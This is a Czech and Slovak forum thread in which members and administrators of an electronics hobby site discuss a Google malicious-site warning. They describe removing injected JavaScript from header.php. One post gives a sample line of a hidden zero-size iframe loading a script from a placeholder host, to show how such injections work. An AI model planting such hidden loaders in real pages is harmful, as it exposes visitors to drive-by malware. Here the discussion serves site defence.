Vítejte na Elektro Bastlírn?
Nuke - Elektro Bastlirna
  Vytvořit účet Hlavní · Fórum · DDump · Profil · Zprávy · Hledat na fóru · Příspěvky na provoz EB

Vlákno na téma KORONAVIRUS - nutná registrace


Nuke - Elektro Bastlirna: Diskuzní fórum

 FAQFAQ   HledatHledat   Uživatelské skupinyUživatelské skupiny   ProfilProfil   Soukromé zprávySoukromé zprávy   PřihlášeníPřihlášení 

Hlášení EB - škodliva/útočná stránka?
Jdi na stránku 1, 2  Další
 
Přidat nové téma   Toto téma je zamknuto, nemůžete zde přidávat odpovědi ani upravovat své příspěvky!       Obsah fóra Diskuzní fórum Elektro Bastlírny -> Provoz fóra
Zobrazit předchozí téma :: Zobrazit následující téma  
Autor Zpráva
procesor



Založen: Oct 02, 2009
Příspěvky: 5286
Bydliště: PO

PříspěvekZaslal: po září 16 2013, 22:53    Předmět: Hlášení EB - škodliva/útočná stránka? Citovat

Čo s tým...


EB_.JPG
 Komentář:

Stáhnout
 Soubor:  EB_.JPG
 Velikost:  44.74 kB
 Staženo:  395 krát


EB2.JPG
 Komentář:
Čo za nezmysly?

Stáhnout
 Soubor:  EB2.JPG
 Velikost:  130.62 kB
 Staženo:  390 krát

Návrat nahoru
Zobrazit informace o autorovi Odeslat soukromou zprávu
MetalGod



Založen: May 30, 2006
Příspěvky: 6558
Bydliště: Seč

PříspěvekZaslal: út září 17 2013, 0:06    Předmět: Citovat

Že by se sem někdo zase nabořil? No, mně, co by linuxákovi, to žíly fakt nerve. Ale kouknu na kód.
_________________
Kdo není ve dvaceti levičák, nemá srdce,
kdo je levičák ve čtyřiceti, nemá rozum.
— Winston Churchill
Návrat nahoru
Zobrazit informace o autorovi Odeslat soukromou zprávu Odeslat e-mail
Hydrawerk



Založen: Dec 13, 2011
Příspěvky: 8011
Bydliště: Earth

PříspěvekZaslal: út září 17 2013, 0:21    Předmět: Citovat

http://www.ebastlirna.cz/modules.php?name=Forums&file=viewtopic&t=13822&start=240
Návrat nahoru
Zobrazit informace o autorovi Odeslat soukromou zprávu
helios



Založen: Aug 08, 2007
Příspěvky: 2914
Bydliště: Tryskáčovo na Záhorí.

PříspěvekZaslal: út září 17 2013, 1:17    Předmět: Citovat

Na mňa to pred chvíľou tiež vyskočilo... Shocked
_________________
Keď Vám hodia pod nohy polená, zakúrte s nimi.
Návrat nahoru
Zobrazit informace o autorovi Odeslat soukromou zprávu Odeslat e-mail
ZVUK2000



Založen: Apr 22, 2012
Příspěvky: 4132
Bydliště: Karvinsko

PříspěvekZaslal: út září 17 2013, 4:45    Předmět: Citovat

Já se ted mohu přihlásit jedině pomoci SZ. Jinak to hlásí škodlivá stránka Cry
Návrat nahoru
Zobrazit informace o autorovi Odeslat soukromou zprávu Odeslat e-mail
Hill
Administrátor


Založen: Sep 10, 2004
Příspěvky: 19927
Bydliště: Jičín, Český ráj

PříspěvekZaslal: út září 17 2013, 4:57    Předmět: Citovat

Vypadá to, že Google změnil stupeň důvěryhodnosti, takže vyžaduje snížit stupeň ochrany našich prohlížečů vypnutím blokování nahlášených útočných stránek.
Teď je otázka, jestli byla hrozba z Bastlírny skutečná (musel by tu být vložený odkaz na nebezpečné stránky), nebo jde o falešné hlášení.
Pravda, nestíhám kontrolovat všechna témata, natož všechny odkazy, ale i tak jich stíhám dost a na dvou počítačích neřval ani Avast Endpoint Protection Plus ani Norton (oba v plné a trvale aktualizované licenci).
Zkrátka víme o tom a pracuje se na tom.
Návrat nahoru
Zobrazit informace o autorovi Odeslat soukromou zprávu
alovka
Zakladatel fóra/superadmin


Založen: Jul 29, 2002
Příspěvky: 286
Bydliště: Ostrava

PříspěvekZaslal: út září 17 2013, 5:48    Předmět: Citovat

Minulý týden jsem odstraňoval škodlivý kód, který byl někým přidán do záhlaví hlavní stránky a hlavní stránky fóra. Jednalo se o nějaký javascript, který se automaticky spouštěl v prohlížeči při rozjetí stránky. Antiviry to běžně zachytili.
Návrat nahoru
Zobrazit informace o autorovi Odeslat soukromou zprávu Odeslat e-mail Zobrazit autorovy WWW stránky
galjo



Založen: Jul 15, 2005
Příspěvky: 1352
Bydliště: záp.slovensko

PříspěvekZaslal: út září 17 2013, 7:44    Předmět: Citovat

To je pravda - ja mám na stránke , kde chodí max 5 ludí tiež momentálne vyhodené - blokovaná stránka - Dôvod: Bola detekovaná hrozba (JS.IFrame.425)
a v navštevách stránky mám takéto niečo.... google-proxy-66-249-83-7.google.com - 20 návštev v priebehu týždňa.
Návrat nahoru
Zobrazit informace o autorovi Odeslat soukromou zprávu
ZdenekHQ
Administrátor


Založen: Jul 21, 2006
Příspěvky: 25741
Bydliště: skoro Brno

PříspěvekZaslal: út září 17 2013, 12:11    Předmět: Citovat

Protože odkaz na případný vir vede ze stránek EB, blokl paranoidní Google celou EB a spustil lavinu. Poslal jsem žádost o odstranění varování, s jejich rychlostí je to tak na týden.

Počet možných zjištěných útoků : 2

Jim je úplně jedno, koho a jak poškodí.

A další hlášení od Google : Googlebot found an extremely high number of URLs on your site. Co je jim do toho ?

Nejspíš je Google sám adept na BAN. Confused

V případě lidí, co mají přístup do databáze či administrace či ftp nás čeká změna hesel, už nad nějakým přemýšlejte.

Alovko, a ty prosím ulož logy přístupů, když něco takovýho objevíš.

_________________
Pro moje oslovení klidně použijte jméno Zdeněk
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?
]


Naposledy upravil ZdenekHQ dne út září 17 2013, 14:57, celkově upraveno 1 krát.
Návrat nahoru
Zobrazit informace o autorovi Odeslat soukromou zprávu Zobrazit autorovy WWW stránky
rnbw



Založen: Mar 21, 2006
Příspěvky: 34871
Bydliště: Bratislava

PříspěvekZaslal: út září 17 2013, 12:22    Předmět: Citovat

Google takto predsa "chrani" pouzivatelov. Nechava si z browseru (Firefox) posielat kazde URL a ak je na blackliste, tak browser zobrazi varovanie. Je to akoze pre dobro pouzivatelov. A Google len tak mimochodom sleduje, kto kam chodi a moze zablokovat lubovolny web...
Návrat nahoru
Zobrazit informace o autorovi Odeslat soukromou zprávu
MetalGod



Založen: May 30, 2006
Příspěvky: 6558
Bydliště: Seč

PříspěvekZaslal: út září 17 2013, 12:45    Předmět: Citovat

alovka napsal(a):
Minulý týden jsem odstraňoval škodlivý kód, který byl někým přidán do záhlaví hlavní stránky a hlavní stránky fóra. Jednalo se o nějaký javascript, který se automaticky spouštěl v prohlížeči při rozjetí stránky. Antiviry to běžně zachytili.
Tak to bych udělal zálohu statických objektů, jejich kontrolní součty, ty pak periodicky kontroloval, a při neshodě nahradil modifikovaný soubory souborama ze zálohy, a přidaný soubory smazal. Tohle by měl umět třeba rsync. Změny by se pak měly provádět na stroji, kde je záloha.
Pokud někdo pozmění statickej obsah fóra, pak, když se bude kontrola provádět každou půlhodinu, útočníkův projev bude mít životnost při obrovský dávce štěstí právě onu hodinu.

_________________
Kdo není ve dvaceti levičák, nemá srdce,
kdo je levičák ve čtyřiceti, nemá rozum.
— Winston Churchill
Návrat nahoru
Zobrazit informace o autorovi Odeslat soukromou zprávu Odeslat e-mail
ZdenekHQ
Administrátor


Založen: Jul 21, 2006
Příspěvky: 25741
Bydliště: skoro Brno

PříspěvekZaslal: út září 17 2013, 12:53    Předmět: Citovat

Blbý je, že já jsem to už několikrát v minulých dnech kontroloval a vir veškerý žádný. Jestli byl i na EB a Alovka ho smázal, pak jsem to přehlédl, neboť už delší dobu řeším jednu stále více blbnoucí ženskou na hraně těžké závislosti na PC hrách versus jedno malé dítě, což je v podstatě každodenní problém, který se stále zhoršuje.

Google třeba hlásí příliš mnoho URL z adresy /ftp/, kam má přes robots.txt zakázaný chodit (a ví to) a naopak si stěžuje na neexistenci adresy http://www.ebastlirna.cz/forum/showthread.php3?threadid=255 a žádá vyřešení, i když je to link starej jak existence EB samotná.

_________________
Pro moje oslovení klidně použijte jméno Zdeněk
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?
]
Návrat nahoru
Zobrazit informace o autorovi Odeslat soukromou zprávu Zobrazit autorovy WWW stránky
MetalGod



Založen: May 30, 2006
Příspěvky: 6558
Bydliště: Seč

PříspěvekZaslal: út září 17 2013, 13:01    Předmět: Citovat

Tam žádnej virus bejt nemusí, bylo by to moc okatý, stačí neškodnej JS, kterej si škodlivej kód stáhne odjinud. Nebo blbej iframe, okno do jinýho serveru. Vždyť co by měl vidět antivirák na tom, že kdesi v kódu fóra přibyl řádek viz dole?
<iframe src="http://www.server.tld/soubor.js" width="0" height="0"></iframe>

_________________
Kdo není ve dvaceti levičák, nemá srdce,
kdo je levičák ve čtyřiceti, nemá rozum.
— Winston Churchill
Návrat nahoru
Zobrazit informace o autorovi Odeslat soukromou zprávu Odeslat e-mail
ZdenekHQ
Administrátor


Založen: Jul 21, 2006
Příspěvky: 25741
Bydliště: skoro Brno

PříspěvekZaslal: út září 17 2013, 13:47    Předmět: Citovat

Pro mě je na EB virus jakýkoliv js kód, co neznám.

A příliš mnoho stránek je druhý problém, jen se to jaksi sešlo. Navíc si stěžoval getmefiles.net na přímé linky z EB, ty jsem deaktivoval.

Kdoví, jak se to všechno v Google poskládalo do sebe.

_________________
Pro moje oslovení klidně použijte jméno Zdeněk
Správně navržené zapojení je jako recept na dobré jídlo.
Můžete vynechat půlku ingrediencí, nebo přidat jiné,
ale jste si jistí, že vám to bude chutnat[?
]
Návrat nahoru
Zobrazit informace o autorovi Odeslat soukromou zprávu Zobrazit autorovy WWW stránky
alovka
Zakladatel fóra/superadmin


Založen: Jul 29, 2002
Příspěvky: 286
Bydliště: Ostrava

PříspěvekZaslal: út září 17 2013, 14:31    Předmět: Citovat

Ten škodlivý kód byl přímo v header.php a ještě v jednom skriptu, který se vkládá (include) do fóra. Mrknul jsem na datumy změny souborů a šlo to najít hned. Byl tam přímo nakopírovaný jeho celý zdrojový kód asi 3kB.
Návrat nahoru
Zobrazit informace o autorovi Odeslat soukromou zprávu Odeslat e-mail Zobrazit autorovy WWW stránky
Zobrazit příspěvky z předchozích:   
Přidat nové téma   Toto téma je zamknuto, nemůžete zde přidávat odpovědi ani upravovat své příspěvky!       Obsah fóra Diskuzní fórum Elektro Bastlírny -> Provoz fóra Časy uváděny v GMT + 1 hodina
Jdi na stránku 1, 2  Další
Strana 1 z 2

 
Přejdi na:  
Můžete přidat nové téma do tohoto fóra.
Můžete odpovídat na témata v tomto fóru.
Nemůžete upravovat své příspěvky v tomto fóru.
Nemůžete mazat své příspěvky v tomto fóru.
Nemůžete hlasovat v tomto fóru.
Můžete k příspěvkům připojovat soubory
Můžete stahovat a prohlížet přiložené soubory

Powered by phpBB © 2001, 2005 phpBB Group
Forums ©
Nuke - Elektro Bastlirna

Informace na portálu Elektro bastlírny jsou prezentovány za účelem vzdělání čtenářů a rozšíření zájmu o elektroniku. Autoři článků na serveru neberou žádnou zodpovědnost za škody vzniklé těmito zapojeními. Rovněž neberou žádnou odpovědnost za případnou újmu na zdraví vzniklou úrazem elektrickým proudem. Autoři a správci těchto stránek nepřejímají záruku za správnost zveřejněných materiálů. Předkládané informace a zapojení jsou zveřejněny bez ohledu na případné patenty třetích osob. Nároky na odškodnění na základě změn, chyb nebo vynechání jsou zásadně vyloučeny. Všechny registrované nebo jiné obchodní známky zde použité jsou majetkem jejich vlastníků. Uvedením nejsou zpochybněna z toho vyplývající vlastnická práva. Použití konstrukcí v rozporu se zákonem je přísně zakázáno. Vzhledem k tomu, že původ předkládaných materiálů nelze žádným způsobem dohledat, nelze je použít pro komerční účely! Tento nekomerční server nemá z uvedených zapojení či konstrukcí žádný zisk. Nezodpovídáme za pravost předkládaných materiálů třetími osobami a jejich původ. V případě, že zjistíte porušení autorského práva či jiné nesrovnalosti, kontaktujte administrátory na diskuzním fóru EB.


PHP-Nuke Copyright © 2005 by Francisco Burzi. This is free software, and you may redistribute it under the GPL. PHP-Nuke comes with absolutely no warranty, for details, see the license.
Čas potřebný ke zpracování stránky 0.15 sekund